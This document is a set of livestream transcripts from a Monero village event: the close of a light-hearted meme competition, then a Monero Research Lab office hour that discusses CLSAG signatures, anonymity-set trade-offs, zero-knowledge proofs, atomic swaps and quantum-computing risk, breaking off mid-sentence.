more memes. What are you guys doing? 100 memes of fire. Just full of cigarette smoke. Let's see. How do you do this? It's not easy. Now if Isthmus or Scott meet, you know, win this one, then we're going to have a problem because then we're going to have a tie again. I won't win. I have literally no clue what to do with any part of this. Like, I'm not familiar with this meme. There's too many characters. This is where we explore. You know, community, how out of touch they are. Well, do you follow memes or something? Are you the one creating all these memes? You've got the meme like a sweatshop going on. That's what's going on. I just find these on meme templates official usually. So there really is a meme on me. Someone's coming up with templates and just putting it in. Man, these are quite the operation. Memes are quite a business. Yes. Well read. Every morning reads his daily meme templates. Yeah, I don't know if you guys followed the meme competition we had on Twitter. We had 300 submissions. It's insane. 300? Yeah. How did you even choose there's only one? Was it a random? Was it like which ones are best? A lot of them are just repeats. So just scroll by. Yeah. I did get help from one other person to go through them. The kid looks like he has his underwear outside his pants but I think it's just his shirt. Oh yeah. Yeah, it's weird. What is that? Tough. You have to zoom in on this one and see what's up. No, it's probably a shirt. No, it's the same as his collar. You can tell it's the same style. So it says underneath his shirt underneath his like sweater or whatever. Sweatshirt, sweater. I always mix them up and my mom yells at me but I don't know the difference between a sweater and a sweatshirt. So confusing. Sounds safari in chat. You've got to be just transparent about where your inches lie. Hey guys, I'm sorry to inform you. I am going to be winning this one. I am that confident. My hand, that was... Well, you've won all the other ones without even, you know, basically no confidence. Vic won the last one too. We need some actual competition for Vic. Get some people from the doge going community. Real memers. Mike, for Chan, you get some real. Already. It's going to submit like a bunch of different variations of Pepe the Frog and they're going to be in everyone. Did you already get up? Yes, here's Vic. Does it make sense? No comment? I am a professional video host. Okay. Despite all evidence of the contrary. I have no idea what to do with this. Vic's also always like the first person to submit. You should have a clock. You should have a shot clock. See, it's hard for me to enforce because I can't just blast across all your screens. I have like had my phone on the side, but that's not as intimidating. Yeah, that's why we need to have like move right at custom. Okay, honestly, I would love to have... What is that Vic? I should put like a LED on the wall behind. I would love to have like a jack box style meme game. That would be great. Oh yeah. They would coordinate all this stuff. That way I'm not going between three different monitors and taking forever and you know, the like. Someone took a screenshot. Yeah, they did. Yeah, that's like wait what? Who's in my house? That's like the... Is that the sound for like the Ubuntu screenshot tool? It's definitely not a snipping tool. Someone was not using snipping tool. No one's passing up to that. Hmm, this is tough. We have a few more submissions coming in now. Oh, I just woke up. This is too early to do this stuff. What time is it? Where you're at? 8am, not too bad. I messed up the time. I thought it was 8am but it was supposed to be 7am. Hmm. I'm cropping these a little bit where it's not relevant just to try and make them a bit bigger. Alright, I have either all of them or all but one. It's all but one for sure. Maybe you guys can go ahead. I'm struggling. This is an interesting choice when I'm looking at it right now. I get to check it all out. Are you sure, Ruben? Yeah, yeah, go ahead. Okay, okay. So, about to... So we only have four choices this time. Let me share my screen. I'm glad this sharing screen seems to work really, really well. Okay, screen share. Okay, option number one. Minero, kickpoint, chain analysis and privacy. Option number two. Tiger and transparent ledger advocate. I love how they just put tiger on top of tiger. Someone want to explain themselves there? I mean, you're welcome to stay anonymous but... I had to explain. They're more scared of the transparent ledger advocate than the tiger. Oh, god. Okay. That is funny but I just love the idea that you put tiger on your tiger. All right. I'm not at the sweatshop of meme farms. I don't know how this works. I got more laughs out of you doing it that way than if you didn't. So... Actually, what happened to number one? Was it cut off? Or was it intentional? I'm like... I mean, what do you mean by cut off? I don't know. It seems like the tips of the rabbit ears are cut off. It is a black bar. You know what it is. This doesn't actually exist. Sorry. What? I see what you're doing there, Justin. I was trying... That's like one of the... It's like a background trying to divide and things. It's just... I should have sent it as a template background but that was too much work. So I just... They're all objects that overlap each other annoyingly. You can see there's another one over here. All right. Third choice. Undisclosed double spend and transaction with zero decoys. Someone else want to explain this one or should I go for it? I always want to give the person who makes the meme the ability to explain theirs if they want. So go... Okay. And then the fourth one. Ring size 11, ring size 15 and triptych. They definitely cropped off the whole bottom. They're staring at some undefined objects. It's smart to cut off the rabbit. It kind of looks like they're about to fall off the... Indeed. So that's how you pronounce it. Triptych. Well put people in for the votes coming in. Two people said number one. One person said number two. They said number two for the creative use of the word tiger. It's just so absurd. Actually the worst part is I actually covered up the tiger so you can't even see it. It's like it was just grass there. It's just like... Basically waiting on BTC Laverra to determine who they are choosing for. And of course anyone else. But like sound safari, are you going to vote? You've recently chatted. I feel like number two is such an amazing combination of like so bad is good but also good. In more ways than one. Okay BTC is that a vote for number two? For number one. He said tiger so I guess that's number two. Okay number two. Okay so we have three votes for number two and two votes for number one. So ultimately number two is the winner. Vic was that you? No I was number one. I'm just not... Yeah. I thought I did really well. Mr. Poppy did not win. You had to fail really hard but not fail. Exactly. But do you guys get it? Number one it makes sense right? Monero were pushing Bitcoin users to this nice fluffy thing, innocent thing called privacy and they don't understand there's this very tiger chain line ready to eat you up. Yeah yeah. You're probably... No one's impressed. Tiger over tiger. Yeah exactly. Tiger over tiger. Yeah exactly. Tiger over tiger. Tiger session. Very simple but... It's not just the tiger over tiger though. It took a little bit extra explanation I think but overall I still thought it was really funny that like the thing that they were being introduced to is the transparent ledger advocate. Like they're so scared of talking to a transparent ledger advocate. But they're more scared of a transparent ledger advocate than the tiger. You should have put like the Monero users or something, Monero community for those two people. I honestly didn't get it until he was explaining. I was like... Yeah it's pretty good. Now that I've explained it, it is very good. Alright well that concludes our Monero meme competition. So I appreciate everyone who came in and participated. Vic is still the winner because ultimately Vic won twice. Scott won once and to be clear Scott and Vic tied once but really the only reason Vic won was because of Google's die roll. Whatever it takes. Whatever it takes. So apologies Scott. You put in all the work but didn't get any of the recognition there. And then Ismus and BTNerd each won once each. Ruben you didn't get a chance to point out why Zcoin's good. No I'm not going to shield and get like VirtuaTamatas like this. I was expecting you to throw in some like really awesome why Zcoin's better meme. This is your good chance. I like Monero. I mean I like other coins too but if I was brought into the group you gotta make a ruckus. You gotta. Yeah I'm too nice. Alright so with the end of the Monero meme competition that also concludes today's DEFKON Monero village entirely we will be back at 10 am Pacific tomorrow on the same YouTube channel on the same Twitch channel. If you want to watch please come back and watch. You know we'll have a lot of great events coming through. To end tomorrow we will have a trivia night. We'll have a quiz so we'll have another interactive event to finish off tomorrow evening. And then on Sunday you know a bunch of other great talks too. So keep an eye you can go to Monerovillage.org. I'll put that in the chat here in case you have not been following the rest of the talks today. And of course we're starting tomorrow at 10 am with Dr. Daniel Kim like we have started every day. So always really great content from him. So really really cool stuff going on. So yeah thanks everyone who made it this long if you joined just for the Monero meme competition you joined for the fun part maybe not the best part. We can't say that this was useful in any way but it's fun. And yeah we'll see you tomorrow so take care. Good job Justin. Thanks Justin.
|
meme competition
|
10.5446/50658 (DOI)
|
Okay. Hello everyone and welcome to the Mineral Research Lab office hour with me, the host, Justin, and the person who actually want to see Dr. Sringnother. So to start, I would like to have Dr. Sringnother introduce himself before we get started. I think it would be useful to set expectations for what this session is. It's very casual on purpose. We are here such that we can answer your questions, mostly it would be Mr. Sringnother answering your questions. And yeah, so we'll be paying attention to YouTube, we'll be paying attention to Discord just to relay questions over. But otherwise, this is really your time to make of it what you would like. So yeah, we're here to answer anything you have. So how about Sringn, can you introduce yourself please? Sure. So I am Dr. Sringnother, a cryptographer and mathematician who is a research contributor to the Mineral Research Lab. And Mineral Research Lab is a research and development work group. Not the only one, but it's a research and development work group that conducts research and development for the Mineral Project. So that ends up being stuff involving protocol research, some of the math, prototyping, coding, all sorts of things to kind of push the Mineral protocol and privacy preserving digital assets forward in general from a technical perspective. And like Justin said, the purpose of this office hour is to give an opportunity to just kind of very informally give video form in this case in order to, you know, answer any questions that come up top of what people want to know more about. So this could be Justin and I sitting here in the quiet for an hour, like often happens in kind of standard university in-person office hours, you know, or it can be, you know, really whatever sort of technical aspects that folks want to talk about. So I guess I'm using whatever, you know, media you, I guess, have access to. Justin, you said you're watching the Discord and YouTube, is that right? Yeah, so for any questions that people have, you know, go ahead and shoot them off to us there, you can talk about it. Otherwise, I'll sit here. Perfect. I brought my coffee. You know, I haven't had a lot of coffee with my actual coffee chats recently, but I feel like double down on the coffee that last few days. Read the type of person in high school, maybe high school depending, but in college that went to office hours for you to have personally would usually go or is it something to go, you did not go to that often. I did go to office hours, you know, when I had questions and later as a TA and even later as an instructor. I don't know, and then I had a new appreciation for the nature of office hours when I was the one running the office hours. But I did discover that oftentimes it was like this really cool combination of folks who came because they really wanted to understand something they didn't, you know, prior to that, but there are also a lot of students who really didn't know what they were doing, and they were just really interested in making sure that they, you know, kind of had as much face to face time to kind of go over new problems as they could. So, one thing I like is that it's like, oh, this is not some kind of sign weakness to go to office hours. It's like a sign of, I guess, being motivated and dedicated for your learning. But there were still many times when I don't show up to office hours. And then it was just reading books for an hour. What are you going to do? Any questions or any topics of any kind at the moment? There are no questions and no topics of any kind. But of course, we can also talk a little bit of some. Yeah, I was thinking one way we could do is sort of troll the answers out of people. We can just start saying like, Well, what do you think about this obnoxious thing just to give people a riled up about it. But before we do that, how about you tell us talk about what you've been doing with the Mineral Research Lab the last month or so. So, I would say probably like the most interesting thing that people might care about, or hopefully at least they'll care about the effects of it is going to be CL sag, which is, it's a new linkable linkable linkable linkable ring signature. Nope, a linkable ring signature construction that was really intended to kind of be a drop in replacement to the linkable ring construction that the Mineral Protocol used to use is called ML sag. I will say that in hindsight, I really regret us not giving it a cooler name. But you know, what would have been a cooler name for that. I have no idea if anyone has any ideas, you should tell us. I mean, we ended up getting a pretty cool CL sag logo, basically, you know, the consumer community came together, and we had a few ideas that were pitched one of which we ultimately went with in the blog post and they're credited at the bottom. But, you know, it's not quite as as easy to market as something like Halo or Arcturus. Because, you know, originally, the, the, so prior to like the confidential transaction model, the linkable ring signature scheme was one by some other authors is called L sag linkable spontaneous anonymous group signatures. And from that point on, you know, moving into the confidential transaction model where we replaced, you know, kind of in the clear amount commitments to amounts. And then we moved to one that was developed by Shen Noether, and others, kind of more of an in house kind of thing. And that was called ML sag is a multi layered linkable spontaneous, non of a screw signatures. The idea there is that you had both information in the signature that dealt with both like signing keys but also certain commitment keys. And by kind of cleverly setting up and arranging how you do that signature, you could both, you know, show this kind of sign or ambiguous signature model you're looking for, but also throw in a proof of balance, which is very important, but also completely in a non anonymous way. The downside to the ML sag signatures of course you basically kind of have two sets of data floating around in the signature itself. You have some sets of data that deals with like the signing keys and a kind of a separate set of parallel data that deals with the commitment keys. So the scaling on that is not very good. It scales as you know the anonymity sets per transaction goes up skills that way. But at the same time, every time you're adding on, you know, new ring members you're actually having two pieces of data effectively one for signing keys one for committed keys. And so the kind of new hotness now still say, which is concise, linkable, spontaneous and on this group signatures. So it is what it is, those are the names that was chosen and thought about changing it but then we're like, Ah, you know, already named it, can't really rename it. So people already knew about that if we do want to make everything more confusing. So, but the idea there is to kind of take this information involving these, this data for signing keys and the data commitment keys. And it turns out you can combine them together in this weighted fashion that's, you know, involves some hash functions to ensure that, you know, someone can't kind of maliciously go through it and run a forgery on the signature. And basically do the same thing that ML sign signatures do both show and sign ambiguous way that you're signing a message on behalf of one of the unknown keys. I guess one of the sets keys but you don't know which one it is, but also basically signing with this other commitment key that you need to prove balance so it's more or less a drop in replacement but now effectively you only have to have one set of data involved. So one piece of information per ring member and then some additional auxiliary information that's used just to make the algebra work. So the benefits to this are that it's basically a drop in replacement. So that's great. Now everything involving key images ticks around everything involving the way that these keys are structured gets to stick around. But the benefits this benefits that you get for it are that first the signatures are much smaller. So, effectively, the signatures you get for CL sag are about half the size. As for NL sag, that's just the signature alone transactions include more than just just signature. So, the fact that they're smaller in that sense, but they're also faster to verify because it turns out you can do some optimization with the way that these operations take place because before you had to do some cryptographic on like the linkable side of the data and commit inside the data. And now you can effectively do them at the same time, and you can optimize that way a little bit. So benefits there are that you end up with about 20% faster signature verification. So transactions that spend multiple inputs, which most transactions spend between one and two inputs and generate some other outputs. But for everyone of those spend inputs, you need a separate signature. And so it turns out that for the most common forms of transactions, like a two input to output transaction, for example, you end up seeing overall about a 25% decrease in the transaction size and overall probably about a 10% speed up the overall transaction verification. So that's pretty good. You know, there's really no downsides to this. Of course, we want to make sure that the security model for this is very strong. So the security model, it basically just says, you know, what properties do we want this construction to have. And for our particular purposes, we want there to be these properties involving forability and non slander ability and linkability and there's kind of this list of them. We want this linkable ring signature construction to have. So you do is you basically build this kind of hypothetical model of an imaginary attacker. And you kind of give this attack or different powers to do things. So, you know, you might give this imaginary attacker like the power to convince honest users to hand over their private keys. Or you might give this imaginary attacker the power to persuade honest users to, you know, build arbitrary transactions on the attackers we have. And then you show that, you know, even if the attacker had these powers, it still can't go and like generally break these properties that we wanted to have. Without also, you know, breaking some computational problem like the discrete longer than problem that we assume is computation is feasible to do. So you basically say, hi, this hypothetical attacker can't exist. Therefore, we're okay. And so we decided to kind of beef up the security model that was used for CL sag, compared to like L sag and ML sag. And in doing so, ended up with, I would say like a pretty good model for how we want to work. That's pretty good. We're pretty sure that the same security model equally applies ML sag. But, you know, we didn't go back and kind of retroactively do that. This can seem to be pretty straightforward. Do you know if anyone else that is actually using ML sag in a sort of production like Monero is like is there any other application that's widely used for this. Oh, I mean, besides like projects that, you know, use, use it for the same purpose. You know, code forks or, you know, you know, different digital assets that have at least like the same or a similar protocol, presumably use it, but I'm not aware of any other direct applications. So originally, I'll say one of the original paper that originally introduced l sag, you know, one option that was listed was like a voting schemes, for example, where you want to be able to ensure that someone can't vote twice for a particular issue. But also as a man to you among the set of possible voters. I don't think that that's actually been implemented yet and you see your voting is really hard for all the reasons. But it happens to be really good for the purposes that we use for. And so, I guess got to finish up to the Monero Community commissioned and external audit of both the paper, the should be very careful and say preprint. This, this preprint is still technically a preprint so that means it hasn't undergone any other peer review aside from what I'm going to talk about. But we decided to have the preprint externally audited as well as the implementation for the upcoming October network upgrade audited. So that was done. There were two auditors who were commissioned to do that. And that was in kind of in consultation with the open source technology improvement fund, which is a nonprofit that does support for these kind of things. And supported by Monero Community donations. And the auditors had a lot of really good suggestions for how to improve the overall CLCeg security model and preprint. So I ended up changing a few of the proofs around and generally just improving how the security model improves were structured and run. And those didn't actually require any other changes to the scheme itself. So the construction itself and therefore the code didn't change as a result of that. But we're now much more confident in the way that the security model was arranged, some of the definitions, the cryptographic hardness assumptions and things like that. So that's great. Most changes have been made and that's now up on the ICR eprint archive. And then the implementation surprisingly didn't require any real changes for security, which usually you get some in there. They did it. There were a few kind of informational ideas for how to simplify the code. But, you know, we considered that changing those that would have been fairly extensive and how we handle certain key structures and such. And it was thought that it was probably more likely to introduce risk if we made kind of these big sweeping, more informational changes than if we were to just leave it. So, yeah, so the reports available. There's a blog post up on getmonero.org about it. You can read the full reports, take a look at the preprint, look at the code if that's your thing. Yeah, so it's scheduled to be deployed in the October network upgrade. So all you need to do is just keep your software updated to use a hardware wallets like the Trezor ledger. That's in process as well. And they're firmware and apps updated as well to make sure that that's good to go on a day in day when we're ready to go to. So use those make sure you can get for more updated as well. And you're good to go. Very cool. We had a question come in from on the days he asked if there's any plans to in the future move past ring signatures to something that is not just hidden between other decoys, but you know, have this additional protections beyond just a decoy level protection. So I guess, you know, there's quite a few things that I know are involved in this question one is like, we have the current decoy selection which per transaction is a relatively small number of decoys per selection which provides reasonable you know, mass surveillance protection but less so good targeted surveillance if someone knows information about particular transactions. So I guess given the current situation. What is the approximate timeline forward. Not necessarily the timeline but the the set of potential improvements forward for whether or not ring signatures are sort of the right approach for the future. And how you've approached dealing with what the core problem of the relatively small per transaction decoy levels. Yeah, yeah, so so really the question seems to be kind of about and like per transaction and an empty sets. I increasingly dislike the idea of using the term ring signature to purely mean a limited anonymity set. Just because while it has been the case so far that our ring signature construction does have a limited anonymity set. I don't think it's like necessarily the correct term to use so it's possible to build transaction protocols with limited and any sets or full any sets, you can probably do all sorts of other things. I mean we know there's transaction protocols that have no end in the sets. But those are typically not the ones we're interested in. So what we do right now is we do in fact use a linkable ring signature as kind of a building block, you know limited anonymity set transaction protocol for the monaric protocol. That's not the only way to do it though. So it's possible to build limited anonymity set transaction protocols that use for example specialize your knowledge proving systems. So I really don't like the whole idea of like zero knowledge meaningful anonymity and bring signature meaning not because like that's not that that tends to be certain implementations now, but it is not generally true. I mean those things have much more technical meanings involving kind of proof and signature constructions, but using them the way that we do today so you know it's possible to kind of migrate over to a still limited anonymity set construction, but one that permits much larger anonymity sets for you know reasonable transaction sizes of times, but in a way that ideally would help against you know certain other forms of analysis or attack. And right now, the way that the transaction protocol signature scale is that they scale linearly with the size of the end of the set so you're really you're really kind of stuck there. And there's been some proposals for ways to use different kinds of specialized zero knowledge proving systems. Some examples of that are omni ring is one of them. And the one that's in the list is another one ring CT three triptych tourists. There's probably other ones that I'm just not thinking right now. But all of these essentially allow a transaction proof, along with possibly some other auxiliary proofs that scales much better in terms of size and scales a little bit better in terms of time. So verification time is unfortunately kind of the sticking point for this so if you want a trust free, like a non centralized trusted setup style, proving system and transaction protocol, you can make those proofs very small. We know how to do that already. They're not as small for example as like the proofs not the transaction proofs and say Zcash, but they're still quite small for the size of the limited anonymity set you can get. But verification time is always a sticking point. So with those particular kinds of protocols and proofs, you do need still like a almost linear verification time, not be the sticking point. So, that's kind of the limitation that that exists. There are options. They've all got some trade offs in terms of, you know, what you can do with things like tracing and how the construction works. There are some changes that involve changes to multi signature operations. There's changes to the way that linking tags work, which is kind of require almost sort of like a pool migration that can still be done safely. And so which one of these if any should be the one going forward is kind of up in the air right now. A lot of it depends on what trade offs people are willing to accept. And also what trade offs people are willing to accept in terms of mainly like transaction verification times. Now, obviously we'd like verification as low as possible, because that means, you know, faster operations. But that is to be balanced again what kinds of analysis and attacks you want to be able to protect against. So, ideally what we'd love to do is move to something that isn't that full anonymity set. And so an example that right now is something like, you know, the Zcash protocols, where different anonymity sets that are involved there are basically enforced using proofs that, you know, do things involving Merkel tree proofs. And what that effectively does is effectively gives you, you know, full anonymity set within that pool absent external information. That would be ideal. But right now, all the proposals that are kind of on the table for doing that suffer a lot in terms of either centralized trust, or in terms of say, proof size or time. Right now you can't really have everything if you don't want to have centralized trust. And of course, you know, there's also other issues with that. You know, for example, in many of the protocols in many of the pro. Yeah, I think that's probably one of the next speakers. I assume. But anyway, right now like that's kind of limitation. So under the assumption that you know the project in its community are unlikely and move to something that would require centralized trust. You know right now there has to be a limitation limited, and so there's still questions about, you know, how do you end up choosing most anonymity sets. There are definitely ways that you can do it that I think provide improvements over the way we do it now as you get bigger anonymity sets. You can do certain kinds of binning with the outputs and losanimity sets. And that can mitigate certain kinds of heuristics involving common ownership and the source of where those outputs came in terms of transactions earlier on the chain as well as timing analysis. So there's a lot of interesting stuff you can play with but I don't think there's a really good understanding right now of what exactly those precise trade-offs people are willing to make are. Yeah, I hope that is. In my experience, honestly, we have code that can do this now but I think it's a matter of kind of the community and researchers and developers kind of getting into agreement on what those trade-offs should be. So, and again, hopefully, eventually we get to something that is efficient and trust-free, which would kind of check all the boxes for everyone. If from there you could very likely build a protocol that uses such a system and does in fact give you effectively, you know, fall-animity, which presumably would be enforced. In my experience, when people talk about full anonymity or limited anonymity, it's sort of in an academic only way and then it's applied to like, you know, it's typically the way things are currently, right? So limited anonymity looks like a Monero's case, right? And that in many cases, people think that that just can't even really change. They don't really think about these limited is just anything worse than the full pool. And that could be a larger number than the entire size of the pool of a different network, theoretically. And then people are just like... Yeah, and it also depends on what exactly the threat model is, right? Are you concerned about knowing various after making a bunch of controlled purchases and then examining the possible transaction tree between you and like, and I don't know, in exchange with whom this person or entity is colluding? So, you know, given that, you know, it's very difficult to get, I would say, like practical anonymity, you know, in that particular circumstance. And there's plenty of other circumstances that you can dream up where under certain threat models, limited anonymity just won't work for you. So it's one of those like, it's one of those infuriating, it depends kind of ends, where it's like limited anonymity right now is a trade-off. It is like an absolute trade-off. And we all look forward to the day when we can do something that's trustworthy. And, you know, frankly, like if your particular threat model is going to require, you know, a more full-en anonymity scenario, you know, then you might have to consider whether or not going to like a trusted setup sort of scenario is something that you need to do. That may come with, it's other trade-offs, you know, based on things like ecosystem availability and, you know, a host of other questions. But it's absolutely a trade-off, you know, and I think it's important to acknowledge that, you know, we have things like the Breaking Manera series where we kind of try to tease out some of the particular scenarios under which limited anonymity can be a problem. And those for which it might not be as much of a problem. But, and it's, I feel like, you know, it's not fun to like sit down and try to enumerate and think about the specifics of our risk model, but, you know, it's something that I fortunately, right now, I'm kind of have to do. We haven't had a Breaking Manera series in a while. So I guess, given that we haven't, what are, what episode ideas do you, would you like to see there be episodes for? Oh man, I think it'd be interesting to do one that talks about, I guess, some more specifics on things like churn and self-send operations. So I would say things like that, something involving things like output merging would be very, very interesting, you know, where outputs from different transactions end up being pulled into different anonymity sets into the same later transaction. And looking at ways to possibly mitigate that. You know, larger anonymity sets with good output selection can mitigate that example. The churn example is a bit tougher because you could look at things like, you know, possible chain history sizes and distributions. And look at, you know, what happens with that. It gets, yeah, there's a lot of just interesting things to talk about, but I think it's important to do them in a way that doesn't end up kind of just rapidly evolving into, you know, confusing graphs and, you know, irritating math. But at the very least, I think I'm really happy at least to see that there is a lot of interesting research into this area. You know, a lot of folks who want general zero knowledge proving systems that are trustworthy and efficient. And, you know, that would, I think, be like the ideal, you know, checking of all the boxes. And it's interesting to see what different projects do, right? You know, I mean, things like Zcash and related projects get, you know, efficient proofs that are very fast to verify and you can do things like affected with bull anonymity set transaction protocols in theory, ideally, Zcash kind of has their whole optionality part to it, but are willing to sacrifice trust to a degree to like a multi-party computation, you know, and there's always kind of the question of like, for your personal use case and how you tend to view multi-party computation, you know, do you think that a multi-party computation is set up kind of diffuses the trust out enough to where you're okay with that or are you not okay with that? You know, because in theory that does provide like a guaranteed, you know, this is how the soundness of this operation could fail scenario. If a multi-party computation were, you know, misused, for example. So, so many questions in this space. And so many trade-offs. You like a lot of cryptography is basically just like the precise study of mathematical trade-offs. But, you know, no, I don't really have a good timeline for when, you know, you might be able to move to something that is, you know, where you consider full anonymity, but there are options for increasing the anonymity set, which lets you do a lot of other cool things, hopefully mitigate some kind of logistics. So, I think it's all that we think, but I think it'd be improvement. So that's on the tip for October, right? Okay. Not for October. So, I mean, there's other interesting things, you know, on the horizon too. Ideas for making range groups a little bit more efficient have come up. There was a preprint that came out on improvement to bulletproofs, bulletproofs plus. The plus actually means, the plus actually means taking away a few proof elements, but bulletproofs minus doesn't sound as good. So, I don't know. There was a proposal to do an implementation of that. It's really new. It's kind of an extension of the way that the bulletproofs inner product protocol works. It's cool. There's a school waiting operation with it. And it would let us, you know, take a few dozen by software transactions. In theory, they'd be like very, very marginally faster to verify, but, you know, in practice, it would pretty much be a wash, I think, in the grand scheme of things. So really the question about whether or not it is worth moving to that is worth the effort. And the possible risk of something that's a bit newer has yet to be determined entirely. Were there any other questions that came up besides the one that got us into a very long discussion about protocols? Yeah, there's one. It's still protocol related question. So it is going to be a follow up, though. It says, so the ideal solution for Monero would be ZK Snarks like thing that doesn't require a trusted setup. And I believe you basically said yes, but also it needs to be efficient. Yeah, yeah, yeah. And specifically saying like ZK Snarks specifically, you know, it's, there are different ways to, there are different building blocks you can use to construct protocols. And I think it's important to consider it at a protocol level. So for example, like you could basically build something akin to, you know, like the Zcash sapling protocol for example, but without using ZK Snark construction, you could do that with bulletproofs for example. I don't think it's actually been done, but I know that there were some estimates made to say, okay, you know, bulletproofs is a zero knowledge proofing system. The scaling is, you know, in terms of verification is not as good, just absolutely not. But what it lets you do is it lets you prove things about circuits in a trust free way. So that is trust free. And so in theory, you could take, you know, the circuit that's using Zcash sapling and some of the other constructions and you can build that in bulletproofs and you get rid of trust. And the size would still be pretty good. The estimates and the size of like, it'd be competitive. Not as quite as good, but still pretty competitive. But the verification would be, no, it wouldn't work. Estimates I saw are like still on the order of a second, which you're like, well a second, that's pretty fast. It's like, yeah, but then you got to do that like a million times. So you can like amortize that down with backshading stuff, but it seemed like it was not quite doable at this point. So I would say something that would let you do like the whole Merkel proof kind of thing that effectively lets you do a full anonymity set based protocol would be ideal if, you know, we could make it mandatory, which other projects have shown you can do that to ensure optimal privacy. But also I think ideally is making it trust free or at least if using the trust and the soundness out to the point where everyone is satisfied with it. And I think it's been the general view of, you know, a lot of folks who support the idea of Monero to just reduce that trust down to nothing. You know, whereas for other projects, they decided that they're okay with, you know, kind of delegating that soundness risk off to a large enough, you know, set of participants in a multi-party competition that they are safe, you know, secure enough that they're, I guess, okay with the security of, it's not really an upgrade to say that, but that is risky, you know, I mean, like the sprout multi-party computation that started Zcash, for example, did have a soundness problem. And there was a kind of a whole deal where they had to end up taking down the proof transcripts and helping that no one was able to figure out and abuse that. So like there's a real non-trivial risk involved, even to something like such a multi-party computation. So that's not without risk either. And it makes the trust situation a little bit more tricky. So I guess I am personally the opinion that, you know, I like the idea of, I guess, kind of minimizing the possible soundness problems, you know, a soundness problem for something that involves like a trust and setup is the trust and setup in a multi-party computation, you know, for something that, for anything that uses, for example, Peterson commitments, which Monero does, other projects do too, Zcash does, you know, nimble level-based assets do, you know, in theory, if you could break Peterson commitments, that's a problem with, you know, something akin to soundness as well. So it's definitely kind of like this different like threat profile. And ideally we want to minimize that. Got it. Something that was discussed quite a few years ago, but I don't think has really come up super recently is the idea of second layer networks on Monero, like what if you want to put the Lightning network on Monero? What if you want to put this, that or the other on Monero? What if you wanted to put a, you know, a like ZK Snarf mixer on Monero, like as an optional thing? Like, so I guess what sort of building blocks need to happen to allow greater compatibility, knowing that right after this, we also have a talk about atomic swaps for Monero too. Yeah, yeah, which is a really cool new thing. That's still in progress, but yeah. So there's some other researchers who were looking at the possibility, what would it take to do say, you know, atomic swaps between something like Monero and you know, something like Bitcoin, for example, where in Bitcoin, there's a lot of stuff you can do because Bitcoin has both scripting capability, but also, you know, some different, some different kind of setups in how it's, you know, its protocol works and in how it runs things like signatures and the like. And that gets really tricky because Monero, does not have inherent scripting capability. Adding inherent scripting capability would be pretty awful for fungibility. So I tend to view that as probably a non-starter on Monero's side. So given that the question is, well, okay, so what could you do for something like atomic swaps? And one idea that maybe talked about in the next talk, so we'll try not to give too much away, involved a particular zero knowledge proof that was kind of unspecified at the time in the write-up. In theory, we could have done it with something like bulletproofs, but it would have involved hash functions and that's kind of gets messy to do in, you know, in circuits. So that was not ideal. But then, you know, they came up with another idea that uses this clever cross-group proof, where you basically prove that across two different groups, which are, you know, otherwise, basically algebraically incompatible, and you can show a quality of like an unknown street log. And it turns out if you can do this, you know, you can very cleverly kind of build it into this protocol involving some Monero transactions and some Bitcoin style transactions in a way that could let you do atomic swaps. Pretty darn interesting. You know, there's still some kind of open, ongoing questions about, you know, how you need to structure those transactions just to make sure that, you know, if one or more parties that are involved in this and doesn't follow the protocol, you know, what are the risks to funds of anything? What's the worst case scenario that could occur? And even then saying, well, okay, suppose that the protocol does work exactly as you would expect and the swap does happen. You know, what information that they need is that leak across, you know, one or more of those chains. So, I mean, for example, if you use the centralized service to do swaps right now, like that can obviously have some risk because that entity knows presumably where assets came from and where they're sending them to. So, you know, it kind of is a central storage kind of risk. But also you can do different kinds of timing analysis and other amount analysis across different chains to try to determine, you know, what's going on and what funds are moving where. And if that's a risk for you, then you don't really want that. So, I think the question of what, if anything, about that kind of analysis would transfer from the current setup, which is like, you know, use the centralized service to do my exchanges versus saying, well, I'll just do it atomically without a central service. Like what kind of analysis could still happen? It's not nothing, because metadata always exists. But I think the question of to what extent does it happen? And, you know, is that something that you want to do? I think are still open, but very interesting nonetheless. There were some other ideas for stuff like payment channel networks, even within Monero. My DLSag was another signature construction that some other researchers came up with. And we looked at it and unfortunately had like this tracing problem that's whatever I'm looking for, tracing problem that's, would have required this whole self-spend thing. And it was, it kind of got messy and there wasn't really a great solution for it, unfortunately. So that kind of ended up being dead in the water for that purpose at least, which was really unfortunate. Because DLSag would have opened the door to some interesting stuff. Got it, got it. I know this isn't- I know there's LSAG names, just- Yeah. Eventually it was going to be everybody. Something involving an LSAG construction, just for even more confusion. So I know this isn't your work directly, but I know Ismus recently opened a community crowdfunding system proposal to look into potential, potential limitations in Monero related to quantum computing. He was going to look at the initial scope of what basically challenges Monero needed to address going forward. Can you speak a little bit about what, what this general work is doing? And then also speak about Monero and quantum computing generally. Yeah, so this is work that's ongoing. They believe we're going to work on three months. They're about to end up the first month, I think, of that. So again, I'm not directly working on this, so I don't want to try to speak to them or anything. But their idea was, okay, under the assumption that someday quantum computers would exist. And there's definitely debate on, like to what extent people think that this would be a problem in the future. If so, how far into the future? And if all of that, what actions would we want to take now in the protocol to try to mitigate the possible future effects of quantum computers? And they want to look at kind of different parts of the protocol, of range groups and range signatures and kind of a one-time addressing construction and all of this stuff. To what extent would different parts of the chain be considered at risk? The way the Monero keys work, there's a private key and a public key. And they're related by this algebraic group operation. And it's pretty well understood that the one-way map right now from private key to public key, where we assume that it's computationally feasible to determine the signing key, just if you see a key on chain, assume that that's very difficult right now and it's a one-way operation. It's pretty well understood that given a sufficiently advanced quantum computer, that map would be reversible efficiently. So at that point, spend anyone's funds, which I don't know, that's a problem right now. But to some extent, it's not necessarily just a problem for Monero. This is kind of a broadly applicable problem. The entire internet runs on these one-way maps right now to a large extent. So it's kind of one of those, well, your house is on fire, but the rest of the world's on fire too. Doesn't make your fire any less bad, but it does mean that there would be a lot of problems to worry about. But even beyond that, looking at things like, what would that allow you to do to ring signatures? So as one example, since the way that the key images or linking tags work within the Monero protocol, it would allow you to look at different outputs that are part of a ring and determine which of them is the signer, because of the way that the keys work right now. They evolve private keys and you can basically do like a kind of a guess and check testing operation. So again, under the assumption of a hypothetical quantum computer, this is impossible today. As far as we know, you could figure that out. There's some other questions right now involving things like what could you determine about stealth or one-time addressing operations? And that's still, I think, a little bit ambiguous right now. One question that I have that I know is not unique to Monero is saying, well, okay, suppose that I will have a transaction here. Maybe I can't just use that transaction to, for example, figure out what the wallet address of the recipient was. Because remember in Monero, wallet addresses never appear directly on chain. They're used to derive these one-time addresses. So right now, I mean, without external information, you can't just use on-chain information to link those one-time addresses back to the wallet addresses. So the question might be, even with the quantum computer, could you take a transaction and determine its 